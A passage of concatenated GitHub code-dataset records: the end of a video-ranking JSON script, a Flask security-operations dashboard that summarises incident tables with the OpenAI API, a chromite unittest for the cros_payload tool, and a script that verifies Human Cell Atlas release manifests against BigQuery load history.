dec(x):\n r = 0\n for i in range(6):\n r += 
tr[x[s[i]]] * 58**i\n return (r - add) ^ xor\n\n pickups = [\n line.strip(\"\\n\")\n for line in open(\"pickup.txt\", \"r\", encoding=\"utf-8\")\n if line.strip(\"\\n\") != \"\"\n ]\n\n infos = reduce(\n lambda x, y: {**x, **y},\n [getcover(dec(pickups[4 * x])) for x in range(len(pickups) // 4)],\n )\n with open(\"./psdownload/download.txt\", \"a\", encoding=\"utf-8\") as f:\n f.writelines([f\"av{x}\\n\" for x in infos.keys()])\n jsondata = [\n {\n \"rank\": -(x + 4) if x < len(pickups) // 8 else -(x - 1),\n \"av\": dec(pickups[4 * x + 0]),\n \"offset\": 0,\n \"title\": infos[dec(pickups[4 * x + 0])][\"title\"],\n \"up\": infos[dec(pickups[4 * x + 0])][\"owner\"],\n \"pubdate\": infos[dec(pickups[4 * x + 0])][\"pubdate\"],\n \"type\": f\"{pickups[4 * x + 1]}\\\\n\\\\n{pickups[4 * x + 2]}\",\n \"comment\": pickups[4 * x + 3],\n }\n for x in range(len(pickups) // 4)\n ]\n return jsondata\n\n\ndef olddata():\n rankdata = {}\n offsetdata = {}\n for w in range(376, WEEKS):\n last = json.load(open(f\"./DATA/{w:03d}期数据.json\", \"r\", encoding=\"utf-8\"))\n rankdata = {**rankdata, **{x[\"av\"]: x[\"rank\"] for x in last if x[\"rank\"] > 0}}\n offsetdata = {\n **offsetdata,\n **{x[\"av\"]: x[\"offset\"] for x in last if x[\"offset\"] != 0},\n }\n return rankdata, offsetdata\n\n\ndef rankdoor():\n rank = json.load(open(f\"./DATA/{WEEKS:03d}期数据.json\", \"r\", encoding=\"utf-8\"))\n result = [\n [\n x[\"rank\"],\n f\"av{x['av']}\",\n ]\n for x in rank\n if x[\"rank\"] <= 20\n ]\n result.sort(key=lambda z: z[0], reverse=True)\n with open(\"rankdoor.csv\", \"w\", encoding=\"utf-8-sig\") as f:\n for x in result:\n f.write(f\"{x[0] if x[0] > 0 else '旧作' if x[0] >= -3 else '新作'},{x[1]}\\n\")\n\n\ndef main():\n readExcel(f\"{WEEKS}期数据.xlsx\")\n this = json.load(open(f\"./DATA/{WEEKS:03d}期数据.json\", \"r\", encoding=\"utf-8\"))\n last_rank, last_offset = olddata()\n for x in this:\n if last_rank.get(x[\"av\"]) and last_rank.get(x[\"av\"]) > 0:\n x[\"last\"] = last_rank.get(x[\"av\"])\n x[\"offset\"] = last_offset.get(x[\"av\"])\n else:\n x[\"last\"] = \"null\"\n this += pickup()\n json.dump(\n this,\n open(f\"./DATA/{WEEKS:03d}期数据.json\", \"w\", encoding=\"utf-8\"),\n ensure_ascii=False,\n indent=4,\n )\n rankdoor()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Neutralization/MADRankingScripts","sub_path":"tojson.py","file_name":"tojson.py","file_ext":"py","file_size_in_byte":7317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"25937632361","text":"import codecs\nimport csv\nimport os\nimport requests\nimport openai\nfrom flask import Flask, render_template, jsonify, request\nfrom collections import defaultdict\nfrom datetime import datetime\nfrom dotenv import load_dotenv\n\napp = Flask(__name__)\nload_dotenv()\n\n#column definition\ncol_log_source = \"fields.customfield_10223\"\ncol_created = \"fields.created\"\ncol_issue_key = \"key\"\ncol_summary = \"fields.summary\"\n\n# col_log_source = \"Custom field (Log Source Domain)\"\n# col_created = \"Created\"\n# col_issue_key = \"Issue key\"\n# col_summary = \"Summary\"\n\nopenai.api_key = os.getenv(\"OPENAI_API_KEY\")\ncsv_file = os.getenv(\"DASHBOARD_DATASOURCE_CSV_PATH\") # Replace with your CSV file path\ndef parse_csv(file_path):\n incidents = defaultdict(lambda: defaultdict(lambda: {\"count\": 0, \"items\": []}))\n dates = set() # Collect unique dates\n\n with codecs.open(file_path, 'r', encoding='latin-1') as file: # Specify the correct encoding\n reader = csv.DictReader(file)\n 
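# NOTE: csv.DictReader streams rows as dicts keyed by the CSV header line; it\n            # is an iterator with no len(), so totals must be counted while looping.\n            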
# print(\"Length of row:\", len(reader)) # Print the length of sorted_dates\n\n for row in reader:\n print(row)\n customer = row[col_log_source]\n if row[col_created]:\n datetime_string = row[col_created]\n\n # Convert the datetime string to a datetime object\n datetime_obj = datetime.strptime(datetime_string, \"%Y-%m-%dT%H:%M:%S.%f%z\")\n\n # Extract the date portion\n date_only = datetime_obj.date()\n created = date_only\n # created = row[col_created].split()[0] # Extract the date only\n else :\n created = \"\"\n incidents[customer][created][\"count\"] += 1\n incidents[customer][created][\"items\"].append({\n \"issue_key\": row[col_issue_key],\n \"summary\": row[col_summary],\n # \"Custom field (Actual time to first response)\": row[\"Custom field (Actual time to first response)\"],\n # \"Custom field (Raw Alert)\": row[\"Custom field (Raw Alert)\"],\n })\n dates.add(created) # Collect unique dates\n\n sorted_dates = sorted(dates) # Sort the dates\n\n return dict(incidents), sorted_dates\n\n\n@app.route('/')\ndef incident_table():\n incidents, sorted_dates = parse_csv(csv_file)\n return render_template('dashboard.html', incidents=dict(incidents), dates=sorted_dates)\n\n\n@app.route('/convert-to-csv', methods=['POST'])\ndef convert_to_csv():\n table_data = request.json['tableData']\n csv_data = '\\n'.join(','.join(map(str, row)) for row in table_data)\n print(f'csv_data: {csv_data}')\n # response = requests.post('http://openai.com/completion', json={\"string\": csv_data})\n\n # +++\n\n conversation2 = []\n # conversation2.append({\"role\": \"user\", \"content\": \"Hello OpenAI\"})\n prompt = f\"\"\"\n I'm working for a security operation center and i have an incident table below.\n they are incidents of the same customer\n please look for me if there's any particular trend in the incidents today\n anything my SOC analysts should be alert\n also give the count for each group / type of incidents\n {csv_data}\n \"\"\"\n conversation2.append({\"role\": \"user\", \"content\": prompt})\n\n\n response2 = openai.ChatCompletion.create(\n # model='gpt-3.5-turbo',\n model='gpt-3.5-turbo',\n messages=conversation2\n )\n\n ai_response2 = response2.choices[0].message.content\n # ---\n print('chkpt3')\n # response_data = response.json()\n # return jsonify(response_data['data'])\n return {\n \"data\": ai_response2\n }\n\n@app.route('/investigate', methods=['POST'])\ndef investigate():\n data = request.get_json()\n print('investigate:', data) # Updated print statement\n # Perform investigation based on the provided data\n # ...\n # Replace the following example response with your actual investigation result\n\n # response = requests.post('http://openai.com/completion', json={\"string\": csv_data})\n\n # +++\n\n conversation2 = []\n # conversation2.append({\"role\": \"user\", \"content\": \"Hello OpenAI\"})\n prompt = f\"\"\"\n I'm working for a security operation center and i have an incident table below.\n they are incidents of the same customer\n help me to propose how to investigate the below incident ticket\n {data}\n \"\"\"\n conversation2.append({\"role\": \"user\", \"content\": prompt})\n\n\n response2 = openai.ChatCompletion.create(\n model='gpt-3.5-turbo',\n messages=conversation2\n )\n\n ai_response2 = response2.choices[0].message.content\n\n investigation_result = {\n \"description\": ai_response2,\n \"proposedFix\": \"Proposed fix for the issue\"\n }\n return jsonify(investigation_result)\n\nif __name__ == '__main__':\n port = int(os.environ.get('PORT', 3000))\n app.run(host='0.0.0.0', 
port=port)\n","repo_name":"ashvanje/soc-ticket-insight-dashboard","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4841,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"12536477375","text":"from __future__ import print_function\n\nimport collections\nimport sys\n\nfrom chromite.lib import constants\nfrom chromite.cli.cros import cros_payload\nfrom chromite.lib import cros_test_lib\n\n# Needed for the update_payload import below.\nsys.path.insert(0, constants.UPDATE_ENGINE_SCRIPTS_PATH)\n\n# TODO(alliewood)(chromium:454629) update once update_payload is moved\n# into chromite\nimport update_payload\nfrom update_payload import update_metadata_pb2\n\nclass FakePayloadError(Exception):\n \"\"\"A generic error when using the FakePayload.\"\"\"\n\nclass FakeOption(object):\n \"\"\"Fake options object for testing.\"\"\"\n\n def __init__(self, **kwargs):\n self.list_ops = False\n self.stats = False\n self.signatures = False\n for key, val in kwargs.iteritems():\n setattr(self, key, val)\n if not hasattr(self, 'payload_file'):\n self.payload_file = None\n\nclass FakeOp(object):\n \"\"\"Fake manifest operation for testing.\"\"\"\n\n def __init__(self, src_extents, dst_extents, op_type, **kwargs):\n self.src_extents = src_extents\n self.dst_extents = dst_extents\n self.type = op_type\n for key, val in kwargs.iteritems():\n setattr(self, key, val)\n\n def HasField(self, field):\n return hasattr(self, field)\n\nclass FakePartition(object):\n \"\"\"Fake PartitionUpdate field for testing.\"\"\"\n\n def __init__(self, partition_name, operations):\n self.partition_name = partition_name\n self.operations = operations\n\nclass FakeManifest(object):\n \"\"\"Fake manifest for testing.\"\"\"\n\n def __init__(self, major_version):\n FakeExtent = collections.namedtuple('FakeExtent',\n ['start_block', 'num_blocks'])\n self.install_operations = [FakeOp([],\n [FakeExtent(1, 1), FakeExtent(2, 2)],\n update_payload.common.OpType.REPLACE_BZ,\n dst_length=3*4096,\n data_offset=1,\n data_length=1)]\n self.kernel_install_operations = [FakeOp(\n [FakeExtent(1, 1)],\n [FakeExtent(x, x) for x in xrange(20)],\n update_payload.common.OpType.SOURCE_COPY,\n src_length=4096)]\n if major_version == cros_payload.MAJOR_PAYLOAD_VERSION_BRILLO:\n self.partitions = [FakePartition('rootfs', self.install_operations),\n FakePartition('kernel',\n self.kernel_install_operations)]\n self.install_operations = self.kernel_install_operations = []\n self.block_size = 4096\n self.minor_version = 4\n FakePartInfo = collections.namedtuple('FakePartInfo', ['size'])\n self.old_rootfs_info = FakePartInfo(1 * 4096)\n self.old_kernel_info = FakePartInfo(2 * 4096)\n self.new_rootfs_info = FakePartInfo(3 * 4096)\n self.new_kernel_info = FakePartInfo(4 * 4096)\n self.signatures_offset = None\n self.signatures_size = None\n\n def HasField(self, field_name):\n \"\"\"Fake HasField method based on the python members.\"\"\"\n return hasattr(self, field_name) and getattr(self, field_name) is not None\n\nclass FakeHeader(object):\n \"\"\"Fake payload header for testing.\"\"\"\n\n def __init__(self, version, manifest_len, metadata_signature_len):\n self.version = version\n self.manifest_len = manifest_len\n self.metadata_signature_len = metadata_signature_len\n\n @property\n def size(self):\n return (20 if self.version == cros_payload.MAJOR_PAYLOAD_VERSION_CHROMEOS\n else 24)\n\n\nclass FakePayload(object):\n \"\"\"Fake payload for testing.\"\"\"\n\n def __init__(self, 
major_version):\n self._header = FakeHeader(major_version, 222, 0)\n self.header = None\n self._manifest = FakeManifest(major_version)\n self.manifest = None\n\n self._blobs = {}\n self._payload_signatures = update_metadata_pb2.Signatures()\n self._metadata_signatures = update_metadata_pb2.Signatures()\n\n def Init(self):\n \"\"\"Fake Init that sets header and manifest.\n\n Failing to call Init() will not make header and manifest available to the\n test.\n \"\"\"\n self.header = self._header\n self.manifest = self._manifest\n\n def ReadDataBlob(self, offset, length):\n \"\"\"Return the blob that should be present at the offset location\"\"\"\n if not offset in self._blobs:\n raise FakePayloadError('Requested blob at unknown offset %d' % offset)\n blob = self._blobs[offset]\n if len(blob) != length:\n raise FakePayloadError('Read blob with the wrong length (expect: %d, '\n 'actual: %d)' % (len(blob), length))\n return blob\n\n @staticmethod\n def _AddSignatureToProto(proto, **kwargs):\n \"\"\"Add a new Signature element to the passed proto.\"\"\"\n new_signature = proto.signatures.add()\n for key, val in kwargs.iteritems():\n setattr(new_signature, key, val)\n\n def AddPayloadSignature(self, **kwargs):\n self._AddSignatureToProto(self._payload_signatures, **kwargs)\n blob = self._payload_signatures.SerializeToString()\n self._manifest.signatures_offset = 1234\n self._manifest.signatures_size = len(blob)\n self._blobs[self._manifest.signatures_offset] = blob\n\n def AddMetadataSignature(self, **kwargs):\n self._AddSignatureToProto(self._metadata_signatures, **kwargs)\n if self._header.metadata_signature_len:\n del self._blobs[-self._header.metadata_signature_len]\n blob = self._metadata_signatures.SerializeToString()\n self._header.metadata_signature_len = len(blob)\n self._blobs[-len(blob)] = blob\n\n\nclass PayloadCommandTest(cros_test_lib.MockOutputTestCase):\n \"\"\"Test class for our PayloadCommand class.\"\"\"\n\n def testDisplayValue(self):\n \"\"\"Verify that DisplayValue prints what we expect.\"\"\"\n with self.OutputCapturer() as output:\n cros_payload.DisplayValue('key', 'value')\n stdout = output.GetStdout()\n self.assertEquals(stdout, 'key: value\\n')\n\n def testRun(self):\n \"\"\"Verify that Run parses and displays the payload like we expect.\"\"\"\n payload_cmd = cros_payload.PayloadCommand(FakeOption(action='show'))\n self.PatchObject(update_payload, 'Payload', return_value=FakePayload(\n cros_payload.MAJOR_PAYLOAD_VERSION_CHROMEOS))\n\n with self.OutputCapturer() as output:\n payload_cmd.Run()\n\n stdout = output.GetStdout()\n expected_out = \"\"\"Payload version: 1\nManifest length: 222\nNumber of operations: 1\nNumber of kernel ops: 1\nBlock size: 4096\nMinor version: 4\n\"\"\"\n self.assertEquals(stdout, expected_out)\n\n def testListOpsOnVersion1(self):\n \"\"\"Verify that the --list_ops option gives the correct output.\"\"\"\n payload_cmd = cros_payload.PayloadCommand(FakeOption(list_ops=True,\n action='show'))\n self.PatchObject(update_payload, 'Payload', return_value=FakePayload(\n cros_payload.MAJOR_PAYLOAD_VERSION_CHROMEOS))\n\n with self.OutputCapturer() as output:\n payload_cmd.Run()\n\n stdout = output.GetStdout()\n expected_out = \"\"\"Payload version: 1\nManifest length: 222\nNumber of operations: 1\nNumber of kernel ops: 1\nBlock size: 4096\nMinor version: 4\n\nInstall operations:\n 0: REPLACE_BZ\n Data offset: 1\n Data length: 1\n Destination: 2 extents (3 blocks)\n (1,1) (2,2)\nKernel install operations:\n 0: SOURCE_COPY\n Source: 1 extent (1 block)\n 
(1,1)\n Destination: 20 extents (190 blocks)\n (0,0) (1,1) (2,2) (3,3) (4,4) (5,5) (6,6) (7,7) (8,8) (9,9) (10,10)\n (11,11) (12,12) (13,13) (14,14) (15,15) (16,16) (17,17) (18,18) (19,19)\n\"\"\"\n self.assertEquals(stdout, expected_out)\n\n def testListOpsOnVersion2(self):\n \"\"\"Verify that the --list_ops option gives the correct output.\"\"\"\n payload_cmd = cros_payload.PayloadCommand(FakeOption(list_ops=True,\n action='show'))\n self.PatchObject(update_payload, 'Payload', return_value=FakePayload(\n cros_payload.MAJOR_PAYLOAD_VERSION_BRILLO))\n\n with self.OutputCapturer() as output:\n payload_cmd.Run()\n\n stdout = output.GetStdout()\n expected_out = \"\"\"Payload version: 2\nManifest length: 222\nNumber of partitions: 2\n Number of \"rootfs\" ops: 1\n Number of \"kernel\" ops: 1\nBlock size: 4096\nMinor version: 4\n\nrootfs install operations:\n 0: REPLACE_BZ\n Data offset: 1\n Data length: 1\n Destination: 2 extents (3 blocks)\n (1,1) (2,2)\nkernel install operations:\n 0: SOURCE_COPY\n Source: 1 extent (1 block)\n (1,1)\n Destination: 20 extents (190 blocks)\n (0,0) (1,1) (2,2) (3,3) (4,4) (5,5) (6,6) (7,7) (8,8) (9,9) (10,10)\n (11,11) (12,12) (13,13) (14,14) (15,15) (16,16) (17,17) (18,18) (19,19)\n\"\"\"\n self.assertEquals(stdout, expected_out)\n\n def testStatsOnVersion1(self):\n \"\"\"Verify that the --stats option works correctly.\"\"\"\n payload_cmd = cros_payload.PayloadCommand(FakeOption(stats=True,\n action='show'))\n self.PatchObject(update_payload, 'Payload', return_value=FakePayload(\n cros_payload.MAJOR_PAYLOAD_VERSION_CHROMEOS))\n\n with self.OutputCapturer() as output:\n payload_cmd.Run()\n\n stdout = output.GetStdout()\n expected_out = \"\"\"Payload version: 1\nManifest length: 222\nNumber of operations: 1\nNumber of kernel ops: 1\nBlock size: 4096\nMinor version: 4\nBlocks read: 11\nBlocks written: 193\nSeeks when writing: 18\n\"\"\"\n self.assertEquals(stdout, expected_out)\n\n def testStatsOnVersion2(self):\n \"\"\"Verify that the --stats option works correctly on version 2.\"\"\"\n payload_cmd = cros_payload.PayloadCommand(FakeOption(stats=True,\n action='show'))\n self.PatchObject(update_payload, 'Payload', return_value=FakePayload(\n cros_payload.MAJOR_PAYLOAD_VERSION_BRILLO))\n\n with self.OutputCapturer() as output:\n payload_cmd.Run()\n\n stdout = output.GetStdout()\n expected_out = \"\"\"Payload version: 2\nManifest length: 222\nNumber of partitions: 2\n Number of \"rootfs\" ops: 1\n Number of \"kernel\" ops: 1\nBlock size: 4096\nMinor version: 4\nBlocks read: 11\nBlocks written: 193\nSeeks when writing: 18\n\"\"\"\n self.assertEquals(stdout, expected_out)\n\n def testEmptySignatures(self):\n \"\"\"Verify that the --signatures option works with unsigned payloads.\"\"\"\n payload_cmd = cros_payload.PayloadCommand(\n FakeOption(action='show', signatures=True))\n self.PatchObject(update_payload, 'Payload', return_value=FakePayload(\n cros_payload.MAJOR_PAYLOAD_VERSION_CHROMEOS))\n\n with self.OutputCapturer() as output:\n payload_cmd.Run()\n\n stdout = output.GetStdout()\n expected_out = \"\"\"Payload version: 1\nManifest length: 222\nNumber of operations: 1\nNumber of kernel ops: 1\nBlock size: 4096\nMinor version: 4\nNo metadata signatures stored in the payload\nNo payload signatures stored in the payload\n\"\"\"\n self.assertEquals(stdout, expected_out)\n\n\n def testSignatures(self):\n \"\"\"Verify that the --signatures option shows the present signatures.\"\"\"\n payload_cmd = cros_payload.PayloadCommand(\n FakeOption(action='show', 
signatures=True))\n    payload = FakePayload(cros_payload.MAJOR_PAYLOAD_VERSION_BRILLO)\n    payload.AddPayloadSignature(version=1,\n                                data='12345678abcdefgh\\x00\\x01\\x02\\x03')\n    payload.AddPayloadSignature(data='I am a signature so access is yes.')\n    payload.AddMetadataSignature(data='\\x00\\x0a\\x0c')\n    self.PatchObject(update_payload, 'Payload', return_value=payload)\n\n    with self.OutputCapturer() as output:\n      payload_cmd.Run()\n\n    stdout = output.GetStdout()\n    expected_out = \"\"\"Payload version: 2\nManifest length: 222\nNumber of partitions: 2\n  Number of \"rootfs\" ops: 1\n  Number of \"kernel\" ops: 1\nBlock size: 4096\nMinor version: 4\nMetadata signatures blob: file_offset=246 (7 bytes)\nMetadata signatures: (1 entries)\n  version=None, hex_data: (3 bytes)\n    00 0a 0c                                        | ...\nPayload signatures blob: blob_offset=1234 (64 bytes)\nPayload signatures: (2 entries)\n  version=1, hex_data: (20 bytes)\n    31 32 33 34 35 36 37 38 61 62 63 64 65 66 67 68 | 12345678abcdefgh\n    00 01 02 03                                     | ....\n  version=None, hex_data: (34 bytes)\n    49 20 61 6d 20 61 20 73 69 67 6e 61 74 75 72 65 | I am a signature\n    20 73 6f 20 61 63 63 65 73 73 20 69 73 20 79 65 |  so access is ye\n    73 2e                                           | s.\n\"\"\"\n    self.assertEquals(stdout, expected_out)\n","repo_name":"kiwibrowser/src","sub_path":"third_party/chromite/cli/cros/cros_payload_unittest.py","file_name":"cros_payload_unittest.py","file_ext":"py","file_size_in_byte":12783,"program_lang":"python","lang":"en","doc_type":"code","stars":2475,"dataset":"github-code","pt":"52"}
{"seq_id":"14545727059","text":"\"\"\"\nGiven a file containing a list of constituent staging dirs for a DCP release (aka a manifest),\nverify that data has been loaded from each of them to the target DCP dataset and that the count of loaded files\nmatches the # in the staging area.\n\nFiles are determined to be loaded if they exist at the desired target path and crc as defined in the staging\nareas' descriptors. It's possible that an expected file was loaded by another staging dir (i.e., they both\ncontain the same file). While this is discouraged, it's technically possible and we need to accommodate that.\nSo, we check if the target path was loaded, disregarding the source staging dir.\n\nAdditionally, this will check that metadata was loaded properly (including links) by pulling the entity_id, version and\ncontent from the files in GS and checking that the expected row is present in the given dataset. 
If a newer version\nis present in the repo than is staged, we consider that valid.\n\nExample invocation:\npython verify_release_manifest.py -f testing.csv -g fake-gs-project -b fake-bq-project -d fake-dataset\n\"\"\"\nimport argparse\nimport json\nimport logging\nimport sys\nfrom dataclasses import dataclass\nfrom datetime import datetime\nfrom collections import defaultdict\nfrom functools import partial\nfrom multiprocessing import Pool\nfrom typing import Tuple\nfrom urllib.parse import urlparse\nfrom dateutil import parser\n\nfrom google.cloud import bigquery, storage\nfrom google.cloud.storage.client import Client\nfrom dagster_utils.contrib.google import get_credentials\n\nfrom hca_orchestration.solids.load_hca.data_files.load_data_metadata_files import FileMetadataTypes\nfrom hca_orchestration.solids.load_hca.non_file_metadata.load_non_file_metadata import NonFileMetadataTypes\nfrom hca_orchestration.support.dates import parse_version_to_datetime\n\nlogging.basicConfig(level=logging.INFO, format='%(message)s')\n\n\n@dataclass(frozen=True)\nclass PathWithCrc:\n path: str\n crc32c: str\n\n\n@dataclass(frozen=True)\nclass StagingAreaVerificationResult:\n has_metadata_errors: bool\n has_file_errors: bool\n\n def has_errors(self) -> bool:\n return self.has_metadata_errors or self.has_file_errors\n\n\ndef get_staging_area_file_descriptors(storage_client: Client, staging_areas: set[str]) -> dict[str, set[PathWithCrc]]:\n \"\"\"\n Given a set of GS staging areas, return the downloaded descriptors present in each area\n \"\"\"\n\n expected: dict[str, set[PathWithCrc]] = defaultdict(set[PathWithCrc])\n for staging_area in staging_areas:\n url = urlparse(staging_area)\n\n for file_type in FileMetadataTypes:\n prefix = f\"{url.path.lstrip('/')}/descriptors/{file_type.value}\"\n blobs = list(storage_client.list_blobs(url.netloc, prefix=prefix))\n for blob in blobs:\n parsed = json.loads(blob.download_as_text())\n path_with_crc = PathWithCrc(target_path_from_descriptor(parsed), parsed[\"crc32c\"])\n expected[staging_area].add(path_with_crc)\n\n return expected\n\n\ndef target_path_from_descriptor(descriptor: dict[str, str]) -> str:\n return f\"/v1/{descriptor['file_id']}/{descriptor['crc32c']}/{descriptor['file_name']}\"\n\n\ndef find_files_in_load_history(bq_project: str, dataset: str,\n areas: dict[str, set[PathWithCrc]]) -> dict[str, set[PathWithCrc]]:\n client = bigquery.Client(project=bq_project)\n loaded_paths = {}\n\n for area, paths_with_crc in areas.items():\n logging.debug(f\"\\tPulling loaded files for area {area}...\")\n target_paths = [path_with_crc.path for path_with_crc in paths_with_crc]\n query = f\"\"\"\n SELECT target_path, checksum_crc32c\n FROM `datarepo_{dataset}.datarepo_load_history` dlh\n WHERE state = 'succeeded'\n AND target_path IN UNNEST(@paths)\n \"\"\"\n\n job_config = bigquery.QueryJobConfig(\n query_parameters=[\n bigquery.ArrayQueryParameter(\"paths\", \"STRING\", target_paths),\n ]\n )\n query_job = client.query(query, job_config=job_config)\n loaded_paths[area] = {PathWithCrc(row[\"target_path\"], row[\"checksum_crc32c\"]) for row in\n query_job}\n\n return loaded_paths\n\n\ndef parse_manifest_file(manifest_file: str) -> list[str]:\n with open(manifest_file) as manifest:\n # some of the staging areas submitted via the form need slight cleanup\n return [area.rstrip('\\n/').strip() for area in manifest]\n\n\ndef process_staging_area(area: str, gs_project: str, bq_project: str, dataset: str,\n release_cutoff: datetime) -> StagingAreaVerificationResult:\n 
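# Verifies a single staging area end to end: staged descriptors are compared\n    # against the dataset's datarepo_load_history, then metadata rows are checked.\n    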
logging.info(f\"Processing staging area = {area}\")\n\n creds = get_credentials()\n storage_client = storage.Client(project=gs_project, credentials=creds)\n expected_loaded_paths = get_staging_area_file_descriptors(storage_client, {area})\n loaded_paths_by_staging_area = find_files_in_load_history(bq_project, dataset, expected_loaded_paths)\n\n has_file_error = False\n for area, paths_with_crc in expected_loaded_paths.items():\n load_paths_for_staging_area = loaded_paths_by_staging_area[area]\n diff = paths_with_crc - load_paths_for_staging_area\n loaded = len(load_paths_for_staging_area)\n staged = len(paths_with_crc)\n\n if diff:\n logging.warning(\n f\"❌ area = {area} - (data files) Mismatched loaded paths; expected files loaded = {staged}, actual loaded = {loaded}\"\n )\n logging.debug(diff)\n has_file_error = True\n else:\n logging.info(\n f\"✅ area = {area} - (data files) expected files loaded = {staged}, actual loaded = {loaded}\"\n )\n\n has_metadata_error = verify_metadata(area, bq_project, dataset, release_cutoff)\n return StagingAreaVerificationResult(has_metadata_error, has_file_error)\n\n\ndef inspect_entities_at_path(storage_client: Client, bq_client: bigquery.Client, bq_project: str,\n bq_dataset: str, staging_area: str, prefix: str, entity_type: str,\n release_cutoff: datetime) -> bool:\n metadata_entities: dict[str, Tuple[str, str]] = {}\n\n url = urlparse(staging_area)\n if prefix:\n prefix = f\"{url.path.lstrip('/')}/{prefix}/{entity_type}\"\n else:\n prefix = f\"{url.path.lstrip('/')}/{entity_type}\"\n\n blobs = list(storage_client.list_blobs(url.netloc, prefix=prefix))\n\n for blob in blobs:\n content = blob.download_as_text()\n file_name = blob.name.split('/')[-1]\n entity_id = file_name.split('_')[0]\n version = file_name.split('_')[1].replace('.json', '')\n\n # files may be staged after we import, guard against those versions being present\n version_timestamp = parse_version_to_datetime(version)\n if version_timestamp > release_cutoff:\n logging.info(f\"Ignoring file {file_name} staged after cutoff\")\n continue\n\n # multiple versions may be staged, the latest one should win\n if entity_id in metadata_entities:\n existing_version, _ = metadata_entities[entity_id]\n if existing_version >= version:\n continue\n\n metadata_entities[entity_id] = (version, content)\n\n if len(metadata_entities) == 0:\n if entity_type == 'links':\n logging.debug(f\"area = {staging_area} no links data found\")\n return False\n\n logging.debug(f\"️area = {staging_area} No metadata for {entity_type} expected, skipping\")\n return False\n\n logging.debug(f\"Querying for metadata entities of type {entity_type} [area={staging_area}]\")\n entity_ids = metadata_entities.keys()\n query = f\"\"\"\n SELECT {entity_type}_id, content, version FROM `{bq_project}.datarepo_{bq_dataset}.{entity_type}`\n WHERE {entity_type}_id IN UNNEST(@entity_ids)\n \"\"\"\n job_config = bigquery.QueryJobConfig(\n query_parameters=[\n bigquery.ArrayQueryParameter(\"entity_ids\", \"STRING\", entity_ids),\n ]\n )\n query_job = bq_client.query(query, job_config=job_config)\n rows = {row[f'{entity_type}_id']: (row['version'], row['content']) for row in query_job.result()}\n\n has_error = False\n for key, (version, content) in metadata_entities.items():\n if key not in rows.keys():\n logging.info(f\"❌ area = {staging_area} {entity_type} ID {key} not in table\")\n return True\n\n row = rows[key]\n parsed_version = parser.parse(version)\n if parsed_version < row[0]:\n # old version staged but a newer version was present, 
ignore\n logging.debug(\n f\"Newer version of entity present in repo, ignoring. [area={staging_area}, entity_type={entity_type}, id={key}]\"\n )\n continue\n\n if not parser.parse(version) == row[0]:\n has_error = True\n logging.info(f\"❌ area = {staging_area} {entity_type} ID {key} version is incorrect\")\n if not json.loads(content) == json.loads(row[1]):\n has_error = True\n logging.info(f\"❌ area = {staging_area} {entity_type} ID {key} content is incorrect\")\n\n logging.debug(\n f\"✅ area = {staging_area} - (metadata) all {entity_type} entities found ({len(metadata_entities.keys())} entities)\")\n return has_error\n\n\ndef verify_metadata(staging_area: str, bq_project: str, bq_dataset: str, release_cutoff: datetime) -> bool:\n creds = get_credentials()\n storage_client = storage.Client(project=\"broad-dsp-monster-hca-prod\", credentials=creds)\n client = bigquery.Client(project=bq_project)\n\n logging.debug(f\"Verifying metadata for {staging_area}\")\n\n links_errors = inspect_entities_at_path(\n storage_client,\n client,\n bq_project,\n bq_dataset,\n staging_area,\n \"\",\n \"links\",\n release_cutoff\n )\n\n non_file_metadata_errors = [\n inspect_entities_at_path(\n storage_client,\n client,\n bq_project,\n bq_dataset,\n staging_area,\n \"metadata\",\n non_file_metadata_type.value,\n release_cutoff\n ) for non_file_metadata_type in\n NonFileMetadataTypes]\n file_metadata_errors = [\n inspect_entities_at_path(\n storage_client,\n client, bq_project,\n bq_dataset,\n staging_area,\n \"metadata\",\n file_metadata_type.value,\n release_cutoff\n ) for file_metadata_type in FileMetadataTypes]\n\n return any(file_metadata_errors) or any(non_file_metadata_errors) or links_errors\n\n\ndef verify(manifest_file: str, gs_project: str, bq_project: str,\n dataset: str, pool_size: int, release_cutoff: str) -> int:\n staging_areas = parse_manifest_file(manifest_file)\n parsed_cutoff = datetime.fromisoformat(release_cutoff)\n\n logging.info(\"Parsing manifest...\")\n logging.info(f\"Release cutoff = {release_cutoff}\")\n logging.info(f\"{len(staging_areas)} staging areas in manifest.\")\n logging.info(f\"Inspecting staging areas (pool_size = {pool_size})...\")\n\n # we multiprocess because this takes quite awhile for > 10 projects, which is common for our releases\n frozen = partial(\n process_staging_area,\n gs_project=gs_project,\n bq_project=bq_project,\n dataset=dataset,\n release_cutoff=parsed_cutoff)\n\n if pool_size > 0:\n with Pool(pool_size) as p:\n results = p.map(frozen, staging_areas)\n else:\n results = [frozen(area) for area in staging_areas]\n\n logging.info('-' * 80)\n if any(map(lambda x: x.has_errors(), results)):\n logging.error(f\"❌ Manifest {manifest_file} had errors\")\n return 1\n else:\n logging.info(f\"✅ Manifest {manifest_file} had no errors\")\n\n return 0\n\n\nif __name__ == '__main__':\n argparser = argparse.ArgumentParser()\n argparser.add_argument(\"-f\", \"--manifest-file\", required=True)\n argparser.add_argument(\"-g\", \"--gs-project\", required=True)\n argparser.add_argument(\"-b\", \"--bq-project\", required=True)\n argparser.add_argument(\"-d\", \"--dataset\", required=True)\n argparser.add_argument(\"-p\", \"--pool-size\", type=int, default=4)\n argparser.add_argument(\"-r\", \"--release-cutoff\", required=True)\n args = argparser.parse_args()\n\n exit_code = verify(\n args.manifest_file,\n args.gs_project,\n args.bq_project,\n args.dataset,\n args.pool_size,\n args.release_cutoff)\n\n 
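# Propagate the verification result as the process exit status (0 = clean,\n    # 1 = errors) so callers such as CI can gate the release on it.\n    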
